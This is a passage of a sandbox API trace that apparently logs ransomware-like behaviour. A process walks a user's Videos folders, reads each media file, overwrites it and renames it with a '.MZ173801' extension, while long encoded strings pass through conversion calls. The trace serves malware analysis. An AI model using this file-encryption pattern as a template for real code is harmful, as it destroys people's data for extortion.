MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.938] GetCurrentThreadId () returned 0x1358 [0120.938] GetCurrentThreadId () returned 0x1358 [0120.938] GetCurrentThreadId () returned 0x1358 [0120.938] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\pP59u8bd0tGYlQsp.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\pp59u8bd0tgylqsp.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.938] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.938] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.938] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x7338 [0120.938] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.939] ReadFile (in: hFile=0x40c, lpBuffer=0x2439f90, nNumberOfBytesToRead=0x7338, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19f14c*=0x7338, lpOverlapped=0x0) returned 1 [0120.939] CloseHandle (hObject=0x40c) returned 1 [0120.940] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\pP59u8bd0tGYlQsp.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\pp59u8bd0tgylqsp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.941] WriteFile (in: hFile=0x40c, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x7338, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0x7338, lpOverlapped=0x0) returned 1 [0120.942] CloseHandle (hObject=0x40c) returned 1 [0120.944] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\pP59u8bd0tGYlQsp.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\pp59u8bd0tgylqsp.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\pP59u8bd0tGYlQsp.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\pp59u8bd0tgylqsp.flv.mz173801")) returned 1 [0120.945] GetCurrentThreadId () returned 0x1358 [0120.945] GetCurrentThreadId () returned 0x1358 [0120.945] GetCurrentThreadId () returned 0x1358 [0120.945] GetCurrentThreadId () returned 0x1358 [0120.945] GetCurrentThreadId () returned 0x1358 [0120.945] GetCurrentThreadId () returned 0x1358 [0120.945] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd41c8f0, ftCreationTime.dwHighDateTime=0x1d5eef2, ftLastAccessTime.dwLowDateTime=0xf48edd10, ftLastAccessTime.dwHighDateTime=0x1d5ecca, ftLastWriteTime.dwLowDateTime=0xf48edd10, ftLastWriteTime.dwHighDateTime=0x1d5ecca, nFileSizeHigh=0x0, nFileSizeLow=0x7338, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="pP59u8bd0tGYlQsp.flv", cAlternateFileName="PP59U8~1.FLV")) returned 0 [0120.945] GetLastError () returned 0x12 [0120.945] FindClose (in: hFindFile=0xa1bab8 | out: hFindFile=0xa1bab8) returned 1 [0120.945] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68df9520, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xa95c9c0e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa95c9c0e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1bdc8 [0120.945] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0120.945] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.945] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68df9520, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xa95c9c0e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa95c9c0e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0120.945] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.945] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.945] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe72b6470, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x44b30c90, ftLastAccessTime.dwHighDateTime=0x1d5e75c, ftLastWriteTime.dwLowDateTime=0xa94bea45, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x11182, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="7aB-vg.swf.MZ173801", cAlternateFileName="7AB-VG~1.MZ1")) returned 1 [0120.946] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.946] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.946] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x408ee80, ftCreationTime.dwHighDateTime=0x1d5e8b0, ftLastAccessTime.dwLowDateTime=0x52a76ab0, ftLastAccessTime.dwHighDateTime=0x1d5e439, ftLastWriteTime.dwLowDateTime=0xa95a3884, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xfe4f, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="i C0t9ivIXYO.flv.MZ173801", cAlternateFileName="IC0T9I~1.MZ1")) returned 1 [0120.946] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.946] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.946] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8e8190, ftCreationTime.dwHighDateTime=0x1d5f086, ftLastAccessTime.dwLowDateTime=0x80e6dda0, ftLastAccessTime.dwHighDateTime=0x1d5e56c, ftLastWriteTime.dwLowDateTime=0xa95a3884, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xb060, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="mmI1-6XkHu4NPFT8JK.avi.MZ173801", cAlternateFileName="MMI1-6~1.MZ1")) returned 1 [0120.946] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.946] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.946] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd41c8f0, ftCreationTime.dwHighDateTime=0x1d5eef2, ftLastAccessTime.dwLowDateTime=0xf48edd10, ftLastAccessTime.dwHighDateTime=0x1d5ecca, ftLastWriteTime.dwLowDateTime=0xa95c9c0e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x7338, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="pP59u8bd0tGYlQsp.flv.MZ173801", cAlternateFileName="PP59U8~1.MZ1")) returned 1 [0120.946] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.946] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.946] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd41c8f0, ftCreationTime.dwHighDateTime=0x1d5eef2, ftLastAccessTime.dwLowDateTime=0xf48edd10, ftLastAccessTime.dwHighDateTime=0x1d5ecca, ftLastWriteTime.dwLowDateTime=0xa95c9c0e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x7338, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="pP59u8bd0tGYlQsp.flv.MZ173801", cAlternateFileName="PP59U8~1.MZ1")) returned 0 [0120.946] GetLastError () returned 0x12 [0120.946] FindClose (in: hFindFile=0xa1bdc8 | out: hFindFile=0xa1bdc8) returned 1 [0120.946] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19aefc60, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x7b7c4e20, ftLastAccessTime.dwHighDateTime=0x1d5e4e7, ftLastWriteTime.dwLowDateTime=0xa912b150, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x16a89, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="zR2L-Z.flv.MZ173801", cAlternateFileName="ZR2L-Z~1.MZ1")) returned 1 [0120.946] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.946] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.946] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51a28f0, ftCreationTime.dwHighDateTime=0x1d5e2bf, ftLastAccessTime.dwLowDateTime=0x32ae0f20, ftLastAccessTime.dwHighDateTime=0x1d5eaf6, ftLastWriteTime.dwLowDateTime=0xa912b150, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1055a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ZrVO9ZIsn.flv.MZ173801", cAlternateFileName="ZRVO9Z~1.MZ1")) returned 1 [0120.946] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.946] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.946] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51a28f0, ftCreationTime.dwHighDateTime=0x1d5e2bf, ftLastAccessTime.dwLowDateTime=0x32ae0f20, ftLastAccessTime.dwHighDateTime=0x1d5eaf6, ftLastWriteTime.dwLowDateTime=0xa912b150, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1055a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ZrVO9ZIsn.flv.MZ173801", cAlternateFileName="ZRVO9Z~1.MZ1")) returned 0 [0120.946] GetLastError () returned 0x12 [0120.947] FindClose (in: hFindFile=0xa1bcb0 | out: hFindFile=0xa1bcb0) returned 1 [0120.947] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xb8bf1da0, ftLastAccessTime.dwHighDateTime=0x1d5ec4c, ftLastWriteTime.dwLowDateTime=0xb8bf1da0, ftLastWriteTime.dwHighDateTime=0x1d5ec4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="uP0XF1kok-teK_dZt2-3", cAlternateFileName="UP0XF1~1")) returned 0 [0120.947] GetLastError () returned 0x12 [0120.947] FindClose (in: hFindFile=0xa1be00 | out: hFindFile=0xa1be00) returned 1 [0120.947] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5751c20, ftCreationTime.dwHighDateTime=0x1d5ed7f, ftLastAccessTime.dwLowDateTime=0xdcdbe680, ftLastAccessTime.dwHighDateTime=0x1d5eaa5, ftLastWriteTime.dwLowDateTime=0xa80afdbf, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x49e9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nPzlQpS1Oj776IOfWV7.mp4.MZ173801", cAlternateFileName="NPZLQP~1.MZ1")) returned 1 [0120.947] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0120.947] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0120.947] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1c8920, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x6176ef20, ftLastAccessTime.dwHighDateTime=0x1d5efd3, ftLastWriteTime.dwLowDateTime=0xa859fd36, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xaa6a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="OhqnbvOqqEhHEL-.swf.MZ173801", cAlternateFileName="OHQNBV~1.MZ1")) returned 1 [0120.947] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0120.947] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0120.947] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2183e80, ftCreationTime.dwHighDateTime=0x1d5e83a, ftLastAccessTime.dwLowDateTime=0xe1e1fc00, ftLastAccessTime.dwHighDateTime=0x1d5e320, ftLastWriteTime.dwLowDateTime=0xa85c0e87, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x186da, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="PuYC77t.avi.MZ173801", cAlternateFileName="PUYC77~1.MZ1")) returned 1 [0120.947] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0120.947] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0120.947] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ad76e0, ftCreationTime.dwHighDateTime=0x1d5e708, ftLastAccessTime.dwLowDateTime=0xa0f3f860, ftLastAccessTime.dwHighDateTime=0x1d5e63b, ftLastWriteTime.dwLowDateTime=0xa85e706f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xb8c6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RW17m0.mkv.MZ173801", cAlternateFileName="RW17M0~1.MZ1")) returned 1 [0120.947] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0120.947] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0120.947] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3322a480, ftCreationTime.dwHighDateTime=0x1d5ea96, ftLastAccessTime.dwLowDateTime=0x588a02b0, ftLastAccessTime.dwHighDateTime=0x1d5edb9, ftLastWriteTime.dwLowDateTime=0x588a02b0, ftLastWriteTime.dwHighDateTime=0x1d5edb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="suu6d", cAlternateFileName="")) returned 1 [0120.947] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0120.947] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0120.947] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3322a480, ftCreationTime.dwHighDateTime=0x1d5ea96, ftLastAccessTime.dwLowDateTime=0x588a02b0, ftLastAccessTime.dwHighDateTime=0x1d5edb9, ftLastWriteTime.dwLowDateTime=0x588a02b0, ftLastWriteTime.dwHighDateTime=0x1d5edb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bcb0 [0120.948] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3322a480, ftCreationTime.dwHighDateTime=0x1d5ea96, ftLastAccessTime.dwLowDateTime=0x588a02b0, ftLastAccessTime.dwHighDateTime=0x1d5edb9, ftLastWriteTime.dwLowDateTime=0x588a02b0, ftLastWriteTime.dwHighDateTime=0x1d5edb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0120.948] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f968e70, ftCreationTime.dwHighDateTime=0x1d5e9e9, ftLastAccessTime.dwLowDateTime=0x9bfd7d0, ftLastAccessTime.dwHighDateTime=0x1d5e428, ftLastWriteTime.dwLowDateTime=0x9bfd7d0, ftLastWriteTime.dwHighDateTime=0x1d5e428, nFileSizeHigh=0x0, nFileSizeLow=0x10d33, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9XOvT j3.flv", cAlternateFileName="9XOVTJ~1.FLV")) returned 1 [0120.948] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0120.948] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0120.948] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\9XOvT j3.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\9xovt j3.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f968e70, ftCreationTime.dwHighDateTime=0x1d5e9e9, ftLastAccessTime.dwLowDateTime=0x9bfd7d0, ftLastAccessTime.dwHighDateTime=0x1d5e428, ftLastWriteTime.dwLowDateTime=0x9bfd7d0, ftLastWriteTime.dwHighDateTime=0x1d5e428, nFileSizeHigh=0x0, nFileSizeLow=0x10d33)) returned 1 [0120.948] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.949] GetCurrentThreadId () returned 0x1358 [0120.949] GetCurrentThreadId () returned 0x1358 [0120.949] GetCurrentThreadId () returned 0x1358 [0120.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 